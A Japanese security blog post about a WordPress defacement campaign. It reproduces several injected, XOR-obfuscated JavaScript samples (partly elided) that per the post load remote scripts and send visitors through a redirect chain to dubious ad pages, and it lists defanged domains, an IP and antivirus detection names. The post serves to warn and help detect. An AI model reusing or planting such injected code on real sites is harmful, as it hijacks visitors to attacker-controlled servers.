WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
ブログ作成ツール WordPress を使用してるサイトの改ざん被害のお話が報告されてます。 
■ Wordpress header.php var a="'1Aqapkrv'02v{rg injection
https://www.malwareremovalservice.com/wordpress-header-php-var-a1aqapkrv02vrg-injection/
■ The I.T. side of my life: A new WordPress infection: var a="'1Aqapkrv'02v...
http://myitside.blogspot.com/2015/09/a-new-wordpress-infection-var.html
https://www.malwareremovalservice.com/wordpress-header-php-var-a1aqapkrv02vrg-injection/
■ The I.T. side of my life: A new WordPress infection: var a="'1Aqapkrv'02v...
http://myitside.blogspot.com/2015/09/a-new-wordpress-infection-var.html
■ Zscaler Research: Compromised WordPress Campaign - Spyware Edition
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spyware.html
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spyware.html
何かしら WordPress がらみの脆弱性を悪用し、悪意のある第三者が 不正なJavaScriptコードを<BODY>タグの直後に挿入するよう仕込んでるみたい。
<body>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2; 【~中略~】 )'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<追記始め>
同じ攻撃者による、別の不正なJavaScriptコードの紹介です。
<body>
<script type="text/javascript">var a = "'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0: 【~中略~】 @'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<head>タグ終端の直前に挿入されるタイプです。
<!-- ###: -->
<script>var a = "'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{ 【~中略~】 {rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<!-- :### -->
</head>
<追記終わり>
JavaScriptコードが処理されると、欧州ラトビアのサーバーにある不審なURLアドレスを裏で読み込みにいきます。
https://www.virustotal.com/ja/ip-address/91.226.33.54/information/
Google検索
↓
(改ざんされてるブログ)
↓
http //kfc.i.illuminationes[.]com/snitch?default_keyword= ~
http //c11n4.i.teaserguide[.]com/snitch?default_keyword= ~
↓
http //c11n4.i.teaserguide[.]com/in/?_BC= ~
↓
怪しげな広告ページへ
この改ざん被害は、日本語表記の一般サイトでも目にする機会があって、けっこう複数殺られてる感じ? 
複数の不正なJavaScriptコードが挿入されてるパターンも。 
改ざんされてるブログをたまたま踏んだ場合にセキュリティソフトが警告するウイルス検出名はこんな感じ。 
AVG HTML/Framer
BitDefender Trojan.Script.CPY
Kaspersky Trojan-Downloader.JS.Iframe.diq
McAfee JS/Agent.a
Microsoft Trojan:JS/Iframeinject.AE
Sophos Troj/Iframe-NM
/
関連するブログ記事
・ リダイレクト改ざんvar a setTimeout(10) default_keyword encodeURIComponent JavaScriptコード ( WEBサイト・CGI )
<数万ぐらい
